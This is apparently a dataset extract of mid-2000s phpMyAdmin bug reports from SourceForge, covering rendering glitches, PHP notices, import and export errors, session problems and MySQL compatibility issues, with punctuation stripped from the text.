We selected America New York for EST 5.0 no DST instead in usr local www data online mysql libraries common.lib.php on line 2372 I get the above error with php running with scrict mode turned on.
It happens on a bunch of pages where ever it runs a date function.
Please let mek now if you need anything else.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 1940 https sourceforge.net p phpmyadmin bugs 1940 Original author sidhighwind Found in version 2.7.0 pl1","bug"
"24444","8307","Exact row count for MySQL VIEWs.
phpMyAdmin tries to get an exact row count for any MySQL VIEW e.g.
on the database overview page where all tables are listed) by executing a SELECT COUNT ) FROM view name against the VIEW.
This is very dangerous for complex VIEWs on huge tables that should probably only be used with an additional WHERE clause) The exact row count can take a long, long time to execute and build really huge temporary tables on the MySQL server.
As a result phpMyAdmin will be rendered useless on databases with such VIEWs as the overview pages never show up time out).
Furthermore this behaviour of phpMyAdmin can take down a MySQL server completely tables in the VIEW will be locked).
This happened at our site as the execution of the SELECT COUNT ) FROM view name on a VIEW with some JOINs on tables with hundreds of millions of row takes hours.
Solution phpMyAdmin shouldn t get a row count for VIEWs or should at least make this behaviour configurable.
Original URL https sourceforge.net p phpmyadmin bugs 1941 https sourceforge.net p phpmyadmin bugs 1941 Original author bvontob Found in version 2.7.0 pl2","bug"
"24444","8308","Left frame not loaded correct on MySQL error.
This applies to 2.7.0 pl and 2.7.1 dev from CVS).
During the builing of the database treestructure in the left frame, phpMyAdmin will fail to build the rest of the databases if MySQL returns an error.
Clicking on the database name making phpMyAdmin fail the following error is showed also in the left frame) Error SELECT COUNT ) AS num FROM ` lt;mydatabase gt;`.` lt;table gt;` MySQL said Documentation 1016 Can t open file lt;table gt;.ibd errno 1) This will stop phpMyAdmin from loading showing any further data.
From mysql commandline I get mysql gt; use lt;mydatabase gt;; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with A Didn t find any fields in table lt;table gt; Database changed mysql gt; Kind regards Geert Lund, www.GLD.dk Original URL https sourceforge.net p phpmyadmin bugs 1942 https sourceforge.net p phpmyadmin bugs 1942 Original author glund Found in version 2.7.0 pl2","bug"
"24444","8309","Space before PMA linkOrButton link is part of link.
The links [ Edit ] [ Explain SQL ] [ Refresh ] and others created by PMA linkOrButton are shown incorrectly in Safari v2.0.2) the space between the opening [ and the link is also part of the link.
This wasn t the case with 2.6.1 pl3.
Fix attached.
Original URL https sourceforge.net p phpmyadmin bugs 1943 https sourceforge.net p phpmyadmin bugs 1943 Original author ryandesign Found in version 2.7.0 pl2","bug"
"24444","8310","Check tables having overhead link not functioning properly.
If you click the Check tables having overhead link normally found at the bottom of a list of tables names found inside a given database it rebuilds the right hand side of the frameset to contain the entire frameset from scratch.
Looks like a minor HTML issue.
Original URL https sourceforge.net p phpmyadmin bugs 1951 https sourceforge.net p phpmyadmin bugs 1951 Original author snappleman Found in version 2.7.0 pl2","bug"
"24444","8311","No difference between default and no default.
Big problem in PHPMyAdmin is, that you can t set Default value.
Also in show table structure you canxe2x80x99 t differentiate attribute with set Default or no default value.
New versions of MysSQL 5 differentiate `a` VARCHAR 20 ) NOT NULL , and `a` VARCHAR 20 ) Default NOT NULL , When I create this table CREATE TABLE `example` `id` int 11) unsigned NOT NULL auto increment, `a` varchar 20) NOT NULL, `b` varchar 20) default NULL, PRIMARY KEY `id`) ); And make this insert INSERT INTO example b ) VALUES test ); Old version automatically set a to empty string, but MySQL5 return 1364 Field a doesn t have a default value Original URL https sourceforge.net p phpmyadmin bugs 1944 https sourceforge.net p phpmyadmin bugs 1944 Original author tprochazka","bug"
"24444","8312","Safari fieldset float issue in privileges screens.
This patch fixes two more occurrences of the Safari v2.0.2) rendering issues with the floating fieldsets, this time in the privileges section.
For other occurrences of the issue, see 1389868 and 1395590.
Original URL https sourceforge.net p phpmyadmin bugs 1945 https sourceforge.net p phpmyadmin bugs 1945 Original author ryandesign Found in version 2.7.0 pl2","bug"
"24444","8313","JavaScript errors in Firefox 1.5.
On loading main PMA page.
Getting a bunch of JS errors in Firefox 1.5 on XP SP2.
Here s the main one Error myTooltipContainer has no properties Source File http www.electronicinsight.com phpMyAdmin libraries tooltip.js Line 132 Original URL https sourceforge.net p phpmyadmin bugs 1946 https sourceforge.net p phpmyadmin bugs 1946 Original author rbarreca Found in version 2.7.0 pl2","bug"
"24444","8314","Print view and TIMESTAMP NULL.
tbl printview.php uses SHOW FIELDS.
For this table CREATE TABLE `letemps` `id` int 11) NOT NULL auto increment, `username` varchar 80) NOT NULL default , `posted on` timestamp NOT NULL default 0000 00 00 00 00 00 , PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=1 ; SHOW FIELDS returns the posted on column as being NULL.
We should switch to using SHOW CREATE TABLE that reports the truth.
Original URL https sourceforge.net p phpmyadmin bugs 1947 https sourceforge.net p phpmyadmin bugs 1947 Original author lem9 Found in version Latest Git","bug"
"24444","8315","libraries import csv.php csv terminated maxlength=1.
in libraries import csv.php line 15, the field seperator dialog for upload a csv file is generated like so input type= text name= csv terminated value= ; id= text csv terminated size= 2 maxlength= 1 maxlength=1 is probably incorrect because it disallows any control characters as seperators, such as \t tab, 0x09).
15c15 lt; array type = gt; text , name = gt; terminated , text = gt; strFieldsTerminatedBy , size = gt; 2, len = gt; 1), gt; array type = gt; text , name = gt; terminated , text = gt; strFieldsTerminatedBy , size = gt; 2, len = gt; 2), Also, technically, maxlength should have whitespace before it, but thats a minor syntax thing.
Original URL https sourceforge.net p phpmyadmin bugs 1948 https sourceforge.net p phpmyadmin bugs 1948 Original author rhornsby Found in version 2.7.0 pl2","bug"
"24444","8316","On own vhost, PmaAbsoluteUri ends w double slash.
If you have PMA installed on its own vhost, then the code that auto detects the PmaAbsoluteUri incorrectly puts a second slash at the end, and you end up with URLs like this... http pma.example.com index.php?...
...which still works but is ugly.
This broke some time between PMA 2.6.1 pl3, which I had last, and 2.7.0 pl2, which I have now.
Original URL https sourceforge.net p phpmyadmin bugs 1949 https sourceforge.net p phpmyadmin bugs 1949 Original author ryandesign Found in version 2.7.0 pl2","bug"
"24444","8317","Unable to login with cookie auth in IIS 4.0.
Hi, I m unable to login in phpmyadmin with cookie based auth, I chose cookie auth as it is preferred for IIS and I m running IIS 4.0 on NT with latest stable versions of php,phpmyadmin and mysql.
When I fill user and password and hit login I m returned to same login page without any error message, same if I fill bogus user and password.
I already gave read write access to IIS user in the php sessiondata directory, I even can see some cookies on there and also the cookie based calculator php script I m attaching runs well in my IIS, so I m thinking it s not a problem of IIS but of phpmyadmin.
I m using the attached cookie based calculator php script as a test case for my cookie support in PHP IIS, I will test any cookie based script you want me to test in order to solve this issue.
Versions Microsoft IIS 4.0 on Windows NT PHP Version 4.4.1 phpMyAdmin 2.7.0 pl2 MySql 4.1.16 Original URL https sourceforge.net p phpmyadmin bugs 1950 https sourceforge.net p phpmyadmin bugs 1950 Original author gnelson Found in version 2.7.0 pl2","bug"
"24444","8318","import error when memory limit is 1 unlimited).
if I have set PHP memory limit to 1 unlimited), import function give wrong size.
ex.
We can not read too much if size gt; read limit) size = read limit; i got size = 0.25 and fread ) Length parameter must be greater than 0 Original URL https sourceforge.net p phpmyadmin bugs 1952 https sourceforge.net p phpmyadmin bugs 1952 Original author d struction Found in version 2.7.0 pl2","bug"
"24444","8319","DROP database menu update.
Hi, Found an interface bug in both phpMyAdmin 2.6.4 pl3 and phpMyAdmin 2.7.0 pl1.
When dropping several databases thrue mainpage gt; databases, the database menu doesn t update.
Yours, Paul Peelen Original URL https sourceforge.net p phpmyadmin bugs 1958 https sourceforge.net p phpmyadmin bugs 1958 Original author ppeelen Found in version 2.7.0 pl1","bug"
"24444","8320","No server selection in some cases.
Hi!
Today I upgraded my phpMyAdmin 2.5.5 rc2 to 2.7.0 pl2 resulting in something quite unusable If I access the phpMyAdmin directory on my localhost I see No Databases on the left, but no server selection on the right, although I added one database server again localhost) to the config.inc.php; to be correct I copied the config.inc.php from my 2.5.5 rc2.
See the attached screenshot about how it looks in my browser.
A curios thing happend when trying further tricks If I access my 2.5.5 phpMyAdmin and select my localhost, phpMyAdmin goes to my 2.7.0 one, because I set the wrong PmaAbsoluteUri.
Well, I guess it is not your intention that one has to use 2.5.5 to access 2.7.0.
Yours, Robert Original URL https sourceforge.net p phpmyadmin bugs 1953 https sourceforge.net p phpmyadmin bugs 1953 Original author robertbienert","bug"
"24444","8321","DROP VIEW instead of DROP TABLE .... Hallo again, I think it would be fine if the export script could generate a DROP VIEW Statement and not a DROP TABLE Statement if it is working on VIEW Objects ... wouldn t it.
Maybe lem would think it s not really nesessary ... but I do think it is!
BTW The database structure link in left frame is still missing!!
1373804) Original URL https sourceforge.net p phpmyadmin bugs 1954 https sourceforge.net p phpmyadmin bugs 1954 Original author zotteltier de Found in version 2.7.0 pl1","bug"
"24444","8322","Unclosed String Literal causes HTTP to hang.
An unclosed Literal String on a Query causes httpd to hang and eat resources top shows apache eating resources as high as 98 CPU Usage.
Not sure if its an Apache error, PHP error or phpMyAdmin issue, nor if this has been reported before Here s the offender SQL UPDATE `bugs` SET `bug file loc` = NULL, `short desc` = Big description on top voted, we ll see how long this gets on the Top Voted list ;) , `qa contact` = NULL, `lastdiffed` = NULL, `deadline` = NULL, `alias` = NULL WHERE `bug id` = 130 LIMIT 1; The unclosed literal gt; lt; Big description on top voted, gt;we ll lt; see how long this gets on the Top Voted list ;) gt; lt; The script runs until apache times out Fatal error Maximum execution time of 300 seconds exceeded in var www localhost htdocs phpmyadmin libraries import sql.php on line 20 once it timed out the CPU usage goes down as expected.
I ve reproduced this on tree different machines, with different enviroments Apache Version Information Server version Apache 2.0.54 Server built Dec 21 2005 17 40 47 Server version Apache 2.0.52 Server built Dec 15 2005 04 08 26 Server version Apache 2.0.51 Server built Feb 15 2005 15 52 03 PHP Version Information PHP 4.4.0 pl1 gentoo cli) built Dec 28 2005) PHP 4.3.9 cgi) built Nov 4 2005 11 49 43) PHP 4.3.11 cgi) built Jul 11 2005 15 47 05) phpMyAdmin Version Information phpMyAdmin 2.7.0 pl1 phpMyAdmin 2.7.0 pl1 phpMyAdmin 2.7.0 pl2 MySQL MySQL 4.1.14 log MySQL 4.1.12 MySQL 3.23.58 I Hope this help you to find out what s going on =) Regards, Eduardo A. Romero Gxc3xb3mez eromero opengate.com.mx Original URL https sourceforge.net p phpmyadmin bugs 1955 https sourceforge.net p phpmyadmin bugs 1955 Original author earomero","bug"
"24444","8323","echo right in css.php files incorrect.
The lt;?php echo right; ?
gt; s and lt;?php echo left; ?
gt; s in css phpmyadmin.css.php are incorrect.
margin right etc.
in a css file are not a strings that should be i18ned.
Original URL https sourceforge.net p phpmyadmin bugs 1956 https sourceforge.net p phpmyadmin bugs 1956 Original author leonardjo Found in version 2.7.0 pl2","bug"
"24444","8324","window name hash not set.
I get an error lt;base href= http pc2 sqladmin target= phpmain lt;br gt; lt;b gt;Notice lt; b gt; Undefined index window name hash in lt;b gt; httpd HtDocs sqladmin left.php lt; b gt; on line lt;b gt;77 lt; b gt; lt;br gt; gt; This make the base URI not being set correctly which leads to the problem that clicking on a link in the left frame opens a new browser window.
I did not look at the code, but a fix for this annoying bug should be trivial.
Original URL https sourceforge.net p phpmyadmin bugs 1957 https sourceforge.net p phpmyadmin bugs 1957 Original author the mip Found in version 2.7.0 pl2","bug"
"24444","8325","Typing phpinfo.php in the location bar logs out user.
What happened to the php information link on the homepage?
I also noticed phpinfo.php is still in the root directory but when I try to go it directly, it logs me out.
Original URL https sourceforge.net p phpmyadmin bugs 1959 https sourceforge.net p phpmyadmin bugs 1959 Original author luegner Found in version 2.7.0","bug"
"24444","8326","uninit.var in common.lib.php 997. link is used but not initialised, possible this variable can be dropped there!?
Original URL https sourceforge.net p phpmyadmin bugs 1960 https sourceforge.net p phpmyadmin bugs 1960 Original author cybot tm Found in version Latest Git","bug"
"24444","8327","Can t Remove Default Value.
I wanted to ALTER a table to make an INT value AUTO INCREMENT, as with most INT I have it had its DEFAULT value set to 0, so, in order to make it AUTO INCREMENT I had to remove it, but instead of just removing the DEFAULT value it tries to set it to Here s what the resulting query looks like ALTER TABLE `encuestas` CHANGE `idencuesta` `idencuesta` INT 10 ) UNSIGNED NOT NULL DEFAULT AUTO INCREMENT And MySQL responds MySQL said Documentation 1067 Invalid default value for idencuesta Ofcourse I want to UNSET the Default Value by clearing the default input text, but phpMyAdmin thinks i want to set it to the empty string I m Using phpMyAdmin 2.7.0 pl1 MySQL 4.1.14 log PHP 4.4.0 pl1 gentoo cli) built Dec 28 2005 18 44 56) This looks like a minor issue, didn t see it reported.
If anybody is getting troubles with it go to the Execute SQL window and run the query without the DEFAULT and it works fine ALTER TABLE `encuestas` CHANGE `idencuesta` `idencuesta` INT 10 ) UNSIGNED NOT NULL AUTO INCREMENT; Regards, Eduardo Romero lt;eromero at opengate.com.mx gt; Original URL https sourceforge.net p phpmyadmin bugs 1961 https sourceforge.net p phpmyadmin bugs 1961 Original author earomero Found in version 2.7.0 pl1","bug"
"24444","8328","Username with hyphen and Create Database.
When using phpmyadmin towards MySQL lt; 40102 and the username contains an i get No Privileges on the main.php page for create databases.
I found the error in libraries check user privileges.lib.php on row 158. rs usr = PMA DBI try query SHOW GRANTS FOR .
mysql cur user .
; , dbh, PMA DBI QUERY STORE);) The mysql cur user needs to be quoted for it to work if it contains a .
My solution is to change mysql cur user to PMA convert using PMA sqlAddslashes mysql cur user), quoted ) As its beeing done earlier in the code ) Original URL https sourceforge.net p phpmyadmin bugs 1962 https sourceforge.net p phpmyadmin bugs 1962 Original author timeout Found in version 2.7.0 pl2","bug"
"24444","8329","left.php still opens new frames !
honest !.
I saw the previous bugs and browsed through it, there s no way I can manage to get rid of my problem.
left.php does still open new windows.
I tried in Safari 2.0 and Firefox 1.5 on MacOS 10.4.4.
What s wrong ?
In left.php, I get this lt;base href= blah target= phpmain gt; which means SESSION[ window name hash ] is not present understood whatever.
There s nothing in it.
The only way I could get it to work was to change index.php line 48) to SESSION[ window name hash ] = ; which is really not elegant, I have to admit and I hope I won t run into problems.
I ll try to avoid opening multiple windows.
It seems this problem is around since 2.7.0...
Thanks in advance for a workaround !
Original URL https sourceforge.net p phpmyadmin bugs 1967 https sourceforge.net p phpmyadmin bugs 1967 Original author exess Found in version Latest Git","bug"
"24444","8330","Undefined offset 1 in transformations.lib.php 55.
When trying to add a new table to a database with error reporting set to E ALL, many of these notices appear Notice Undefined offset 1 in libraries transformations.lib.php on line 55 This seems to be another case of the problem in bug 1409053.
I only see the problem in PHP 5.1.2, not in PHP 4.4.2, both running on Mac OS X 10.4.4 PPC.
Original URL https sourceforge.net p phpmyadmin bugs 1968 https sourceforge.net p phpmyadmin bugs 1968 Original author ryandesign Found in version 2.7.0 pl2","bug"
"24444","8331","Input field too short for tab delimited imports.
I am importing a tab delimited file into a table using LOAD DATA LOCAL.
In 2.5.5 I could specify a tab with \t as the Field Termined by value.
In 2.7.0 the same field defaults to ; and will only accept one character.
Original URL https sourceforge.net p phpmyadmin bugs 1963 https sourceforge.net p phpmyadmin bugs 1963 Original author jfm5440 Found in version 2.7.0 pl2","bug"
"24444","8332","MySQL error exporting query ending with semicolon.
Take any table with data, or create a simple one like this USE test; CREATE TABLE foo bar VARCHAR 255) NOT NULL); INSERT INTO foo bar) VALUES baz ); Now select data from it, and end the statement with a semicolon SELECT FROM foo; Click the Export link at the bottom of the result set, to export this result.
Use any export format SQL is fine and check the option to save the result as a file.
The problem occurs even if you don t do this, but the error is easier to see if you do.)
The file that gets downloaded includes a PMA error SQL query [Edit] SELECT FROM foo; LIMIT 1 MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ; LIMIT 1 at line 1 PMA seems to be indiscriminately adding its LIMIT clause regardless of whether there s already a semicolon at the end of the user s statement.
I m running PHP 5.1.2 lighttpd CVS gt;1.4.8) MySQL 5.0.18 Mac OS X 10.4.4 PPC.
Original URL https sourceforge.net p phpmyadmin bugs 1969 https sourceforge.net p phpmyadmin bugs 1969 Original author ryandesign Found in version Latest Git","bug"
"24444","8333","Slashed underscores on table privileges.
Possibly been reported before, but I couldn t see it...
Working on tables that contain an underscore in the name eg table name) results in underscores displaying with a slash before them ie table\ name).
This happens in numerous pages and locations when changing privileges.
Original URL https sourceforge.net p phpmyadmin bugs 1964 https sourceforge.net p phpmyadmin bugs 1964 Original author sneddo Found in version 2.7.0 pl2","bug"
"24444","8334","Undefined offset in database interface.lib.php.
There is a problem with the initialization of found inside the preg match call when I use PHP 5.1.2.
If I submit a statement for a table where the WHERE clause contains just columns that do not exist in this table, the following error occurs SELECT FROM diagram part WHERE object type=7 AND object id=5550 Notice Undefined offset 1 in C \Programme\php\phpMyAdmin\libraries\database interface.lib.php on line 140 If I change line 139 from if preg match ?
\\\|\\ ) [ \\\\\ ] ) ?
\\\|\\ ) i , server language, found = array ) ) ) \{ to if preg match ?
\\\|\\ ) [ \\\\\ ] ) ?
\\\|\\ ) i , server language, found ) ) \{ everything is fine.
So you can initialize found to found = array ) BEFORE the preg match call if you want.
It s strange the preg match result for both calls is the same int 1) , but the original line 139 overwrites the found result with the empty array.
We have to look into this PHP related) problem on similar occurences, too!
Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin bugs 1965 https sourceforge.net p phpmyadmin bugs 1965 Original author rele Found in version 2.7.0 pl2","bug"
"24444","8335","Call to undefined function pma dbi try query ).
I think it might be related to https sourceforge.net tracker ?func=detail atid=377408 aid=1388405 group id=23067 Problem was encountered running on MySQL 4.1.16, trying to delete a row.
That table consisted of 21 fields, each being of type text , with no indexes.
No I didn t create that!
G ) I did search for a row, and in the result tried to delete it.
Changing one field to varchar, setting a primary key on it and deleting the same row again worked.
I guess it might have to do with an overlong delete statement being generated or so?
Original URL https sourceforge.net p phpmyadmin bugs 1971 https sourceforge.net p phpmyadmin bugs 1971 Original author neufeind Found in version 2.7.0 pl2","bug"
"24444","8336","auto detection and dirname on Windows.
If I edit a value in a table and click Save, then the next page, which is opened, is a documentation page.
The value change is submitted, but not the View page is opened as expected.
I use PHP 5.1.1 on Apache 2.0.54 with zend.ze1 compatibility mode Off.
I have the most current CVS version of phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 1966 https sourceforge.net p phpmyadmin bugs 1966 Original author nixniemand Found in version Latest Git","bug"
"24444","8337","incorrect merging of parameters array).
For 2.7.1, fix configuration merging that does not work with this kind of directives containing an array.
Original URL https sourceforge.net p phpmyadmin bugs 1970 https sourceforge.net p phpmyadmin bugs 1970 Original author lem9","bug"
"24444","8338","Inconsistent table order.
I ve just noticed that in 2.7.0 pl2 the table order in the left pane is different than the right pane.
Specifically a table name starting with an underscore is at the top on the left, and at the bottom on the right view when viewing all the tables in the database.
As far as I know it has always appeared at the top until this release where it suddenly dropped to the bottom on the right hand view.
I am running php 5.1.2, mysql 4.1.5 gamma nt and running on Windows XP Pro SP2.
Hope thats enough information for you.
Most of the tables are InnoDB except for two MYISAM, and all use the latin1 swedish ci collation.
Original URL https sourceforge.net p phpmyadmin bugs 1974 https sourceforge.net p phpmyadmin bugs 1974 Original author mrsmiley18 Found in version 2.7.0 pl2","bug"
"24444","8339","warning on session autostart=1.
On winXp IIS php 5.1.1 and RedHat Apache2 php 5.1.3 when in php.ini ; Initialize session on request startup.
session.auto start = 1 an error is raised but not shown) who results in a header error Warning ini set ) [function.ini set] A session is active.
You cannot change the session module s ini settings at this time.
in usr local apache2 htdocs phpMyAdmin libraries sessi on.inc.php on line 46 If set back to 0 everything goes fine..... see also my posts on Help and Support Requests!
Original URL https sourceforge.net p phpmyadmin bugs 1972 https sourceforge.net p phpmyadmin bugs 1972 Original author bemu Found in version Latest Git","bug"
"24444","8340","How to get back to database overview page.
If I load a database using the drop down list on the left pane, then click the Home icon, I have no way of getting back to the database overview page that loads when I first selected the database from the list.
The only workarounds are to either load a table first, then click on the bread crumb at the top, or reload the database again.
Original URL https sourceforge.net p phpmyadmin bugs 1976 https sourceforge.net p phpmyadmin bugs 1976 Original author mrsmiley18 Found in version 2.7.0 pl2","bug"
"24444","8341","Damaged tables reporting.
In previous versions of phpMyAdmin, whenever a table couldn t be opened ie due to damage), phpMyAdmin would list it as in use and could be checked for repair.
In the current release, instead of this, the page simply stops loading with the error, Cannot open table \{tbl name\}.
The only way to correct the table is to actually send the REPAIR TABLE `tbl name`; query by hand.
Shouldn t phpMyAdmin work the way it did before?
I m sure not everyone who uses it would know how to send a query themselves.
Is it supposed to be doing this?
PHP 4.4.1 MySQL 4.1.15 OS Whitebox Enterprise Linux 3 Original URL https sourceforge.net p phpmyadmin bugs 1973 https sourceforge.net p phpmyadmin bugs 1973 Original author jakiao Found in version 2.7.0 pl2","bug"
"24444","8342","Clicking Database resets database list.
In the left pane, if you click on the word Database the text label for the database drop down list) and already have a database selected in the drop down list, then the list resets back to the default text of Databases) ...
Original URL https sourceforge.net p phpmyadmin bugs 1975 https sourceforge.net p phpmyadmin bugs 1975 Original author mrsmiley18","bug"
"24444","8343","Page variable not preserved on refresh.
When browsing the last page Page 59) of my table, upon clicking the Refresh link found within the phpMyAdmin interface the browse view refreshes back to Page 1.
The current page being browsed should be preserved during such refreshes.
Original URL https sourceforge.net p phpmyadmin bugs 1977 https sourceforge.net p phpmyadmin bugs 1977 Original author crypt keeper Found in version 2.7.0 pl2","bug"
"24444","8344","setup.php is not included.
After unpacking tar jxvf phpMyAdmin 2.7.0 pl2.tar.bz2 into var www html there is no setup.php in the scripts directory as per the documentation page which says phpMyAdmin comes with a setup script that can help you with creating configuration.
This script is located in scripts folder scripts setup.php Original URL https sourceforge.net p phpmyadmin bugs 1980 https sourceforge.net p phpmyadmin bugs 1980 Original author zer0light Found in version 2.7.0 pl2","bug"
"24444","8345","auto increment string fails to appear not bug 1290413).
Watch this Compatibility mode None CREATE TABLE `akce` `aid` smallint 5) unsigned NOT NULL auto increment, `datum` date default NULL, PRIMARY KEY `aid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8 czech ci AUTO INCREMENT=71 ; Compatibility mode MySQL 4.0, MySQL 3.2.3, ...
CREATE TABLE `akce` `aid` smallint 5) unsigned NOT NULL, `datum` date default NULL, PRIMARY KEY `aid`) ) TYPE=MyISAM AUTO INCREMENT=71 ; column aid should have auto increment property.
When exporting without any backwards compatibility settings, everything works fine, but after selecting ie.
MySQL4, export procedure forgets to add that property to my aid column.
Tried in 2.7.0 either 2.7.
0 pl2.
Using MySQL 5.0.15 nt, PHP 5.0.5 Original URL https sourceforge.net p phpmyadmin bugs 1978 https sourceforge.net p phpmyadmin bugs 1978 Original author pogik Found in version 2.7.0 pl2","bug"
"24444","8346","blank page bugfix for session.inc.php.
The following patch fix the blank page bug that appear when the PHP session.save handler is set to a value different than files .
file to change libraries session.inc.php the folowing original lines start the session on some servers for example, sourceforge.net), we get a permission error on the session data directory, so I add some session name phpMyAdmin ); session start ); must be replaced with start the session [2006 01 25] Nicola Asuni www.tecnick.com the following line was added and the were removed ini set session.save handler , files ); session name phpMyAdmin ); session start ); Additional explanation If your PHP is set to use session.save handler = user the session start fail and raise an exception that could not be displayed due to the .
The result is a blank page without information.
Original URL https sourceforge.net p phpmyadmin bugs 1979 https sourceforge.net p phpmyadmin bugs 1979 Original author nicolaasuni Found in version 2.7.0 pl2","bug"
"24444","8347","undefined variable.
Notice Undefined variable sql query in srv pma HEAD tbl change.php on line 83 See http pma.cihar.com HEAD tbl change.php?db=mysql table=db Original URL https sourceforge.net p phpmyadmin bugs 1981 https sourceforge.net p phpmyadmin bugs 1981 Original author nijel Found in version Latest Git","bug"
"24444","8348","Multiple tabs are selected in navigation.
I completed the following operation 1\.
Load table 2\.
Search for record 3\.
Delete record from table The screen that I am presented with shows the query that I ran and the SQL window below that, but I have both the Browse and SQL tabs selected on the navigation.
I m pretty sure that I should only have the Browse tab selected after an operation like that.
Original URL https sourceforge.net p phpmyadmin bugs 1982 https sourceforge.net p phpmyadmin bugs 1982 Original author mrsmiley18 Found in version 2.7.0 pl2","bug"
"24444","8349","OPTIMIZE and REPAIR options missing.
It would be nice to see the OPTIMIZE and REPAIR functions avaible from the table Structure page or the table Operations page in the table maintenance section.
These options are both available via the list showing all tables in the database, so it would seem logical to me to carry that through for interface consistency.
Original URL https sourceforge.net p phpmyadmin bugs 1983 https sourceforge.net p phpmyadmin bugs 1983 Original author mrsmiley18 Found in version 2.7.0 pl2","bug"
"24444","8350","Problem with PersistentConnections .
Using phpMyAdmin 2.7.0 pl2, PHP 4.3.3, MySQL 4.0.16, Apache 1.3.22 I have a seperate database called pma db which contains all phpMyAdmin related tables.
When, in another database, I browse the contents of a table, all goes well.
After I set PersistentConnections to TRUE in config.default.php and I browse that same table again, I get the following error SELECT column name, mimetype, transformation, transformation options FROM `pma column info` WHERE db name = archieven AND table name = download AND mimetype != OR transformation != OR transformation options != ) MySQL said 1146 Table archieven.pma column info doesn t exist Of course that is correct.
The table pma column info is not located in the database archieven , but in pma db .
After I set PersistentConnections to FALSE again, all works as expected again.
Original URL https sourceforge.net p phpmyadmin bugs 1984 https sourceforge.net p phpmyadmin bugs 1984 Original author tuinhark Found in version 2.7.0 pl2","bug"
"24444","8351","Insert new row from Browse page.
I am seeing errors when using the Insert new row link at the bottom of the Browse page.
I have tested using several recent versions of phpMyAdmin, and each version gives different errors.
Steps to reproduce 1) Select a database 2) Select a table with existing data and click Browse 3) Click Insert new row link AT THE BOTTOM OF THE PAGE 4) Enter some data and submit Error received in latest CVS version using demo hosted at http pma.cihar.com HEAD ) 404 Not Found [ the URL that is not found is http pma.cihar.com HEAD disp message=Inserted rows 3A 26nbsp ] Error received in 2.7.0 pl2 using demo hosted at http pma.cihar.com stable, and using database gwint, table gwint, and specifying id=43 which already exists) Notice Undefined offset 1 in usr share phpmyadmin libraries database interface.l ib.php on line 140 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin libraries database interface.l ib.php 140) in usr share phpmyadmin libraries header http.inc.php on line 13 Error received in 2.7.0 pl1 using MySQL 5.0.15 nt log PHP 5.0.3 Windows 2003) Warning main .
sql.php 3Flang 3Den utf 8 26amp 3Bserver 3D3 26amp 3Bcollation connection 3Dutf8 general ci 26amp 3Bdb 3Ddolphyn 26amp 3Btable 3Dtemp2 26amp 3Bpos 3D0 26amp 3Bsession max rows 3D30 26amp 3Bdisp direction 3Dhorizontal 26amp 3Brepeat cells 3D100 26amp 3Bdontlimitchars 3D0 26amp 3Bsql query 3DSELECT 2B 252A 2BFROM 2B 2560temp2 2560) [function.main] failed to open stream No error in E \Webs\helm phpMyAdmin\tbl replace.php on line 261 Original URL https sourceforge.net p phpmyadmin bugs 1985 https sourceforge.net p phpmyadmin bugs 1985 Original author dolphyn Found in version Latest Git","bug"
"24444","8352","Missing Database Link in left Frame.
Hi, I m missing the Database Link in the left frame.
I mean this one under the drop down menu in versions lt; 2.7 If you have more than one database the dropdown is shown and it s easy to select database, but for users with only one database so the drop down is not shown!
), it s very difficult to create tables in an empty database.
There s only No tables found in database.
on the left side and you have to click Databases and then click this only existing database to get the Create new table on database xxx Dialog.
Greetz hudeldudel Original URL https sourceforge.net p phpmyadmin bugs 1986 https sourceforge.net p phpmyadmin bugs 1986 Original author hudeldudel Found in version 2.7.0 pl2","bug"
"24444","8353","auto increment missing in compatibility mode.
Version phpMyAdmin 2.7.0 pl2 with PHP 5.0.5 and MySQL 4.1.15 nt under Windows 2003 Server.
When exporting an InnoDB database in compatibiliy mode MYSQL323 or MYSQL40, auto increment values are exported but primary columns are not defined auto increment able .
Example with compatibilty MYSQL323 enabled CREATE TABLE `spip articles` `id article` bigint 21) NOT NULL, lt;snip gt; PRIMARY KEY `id article`), lt;snip gt; ) TYPE=InnoDB AUTO INCREMENT=7 ; Default mode same options otherwise) CREATE TABLE `spip articles` `id article` bigint 21) NOT NULL auto increment, lt;snip gt; PRIMARY KEY `id article`), lt;snip gt; ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO INCREMENT=7 ; Original URL https sourceforge.net p phpmyadmin bugs 1987 https sourceforge.net p phpmyadmin bugs 1987 Original author hefpe","bug"
"24444","8354","missing global.
file common.lib.php, function PMA countRecords ...) misses a global declaration for strViewMaxExactCount used in line 1326) Original URL https sourceforge.net p phpmyadmin bugs 1988 https sourceforge.net p phpmyadmin bugs 1988 Original author bananeweizen Found in version 2.8.0 beta1","bug"
"24444","8355","CSV import does not work in 2.8.0 beta1.
When I want to import CSV data no data will be in the DB after the import.
There is no error message and phpMyAdmin shows the Import screen again.
I used all the default values in CSV import.
Server Conf Apache 1.3.34 PHP 4.4.2 mysql 4.1.16 phpMyAdmin 2.8.0 beta1 Client Conf WinNT 4 SP6a Firefox 1.5 For me CSV import is a key feature, without CSV import phpMyAdmin is worthless.
Teddy Original URL https sourceforge.net p phpmyadmin bugs 1989 https sourceforge.net p phpmyadmin bugs 1989 Original author teddych Found in version 2.8.0 beta1","bug"
"24444","8356","Memory leaks.
My PHP 5.1.2 debug enabled, memleak reporting) reports memory leaks for phpMyAdmin 2.8.0 beta1 in the Apache error log .. usr local src php 5.1.2 main php variables.c 186) Freeing 0x31FD33EC 16 bytes), script= apache htdocs hotel phpmyadmin index.php usr local src php 5.1.2 ext standard string.c 3006) Freeing 0x31FCBEAC 28 bytes), script= apache htdocs hotel phpmyadmin css phpmyadmin.css.php usr local src php 5.1.2 main php variables.c 186) Freeing 0x31FCB53C 16 bytes), script= apache htdocs hotel phpmyadmin css phpmyadmin.css.php usr local src php 5.1.2 ext standard string.c 3006) Freeing 0x31FD9CEC 28 bytes), script= apache htdocs hotel phpmyadmin left.php .. Any idea on thow to debug those?
Things seem to be working OK, but of course, something is wrong somewhere. )
